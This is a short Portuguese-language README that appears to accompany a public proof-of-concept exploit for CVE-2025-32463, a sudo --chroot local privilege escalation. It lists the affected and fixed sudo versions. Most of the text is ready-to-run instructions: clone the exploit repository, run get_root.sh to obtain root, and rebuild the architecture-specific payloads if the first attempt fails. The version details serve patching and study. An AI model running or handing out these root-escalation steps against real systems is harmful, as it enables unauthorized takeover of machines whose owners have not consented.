
- Vulnerável: sudo 1.9.14, 1.9.15, 1.9.16, 1.9.17 - Corrigido em: sudo 1.9.17p1 e versões posteriores - Versões legadas anteriores à 1.9.14 não são afetadas, pois não suportam a opção --chroot.
# get_root.sh e get_root.py fazem a mesma coisa.
git clone https://github.com/shazed-x/CVE-2025-32463
cd CVE-2025-32463
./get_root.sh
Não é necessário gcc na máquina alvo. O PoC funciona verificando a arquitetura atual (ex.: x86_64, aarch64) e, em seguida, executando o payload dinamicamente pré-compilado correspondente. Se isso falhar, ele usa o payload estático como padrão.
Se o exploit falhar na sua máquina, você ainda pode compilá-lo usando:
./mkall-dynamic.sh
# depois execute
./get_root.sh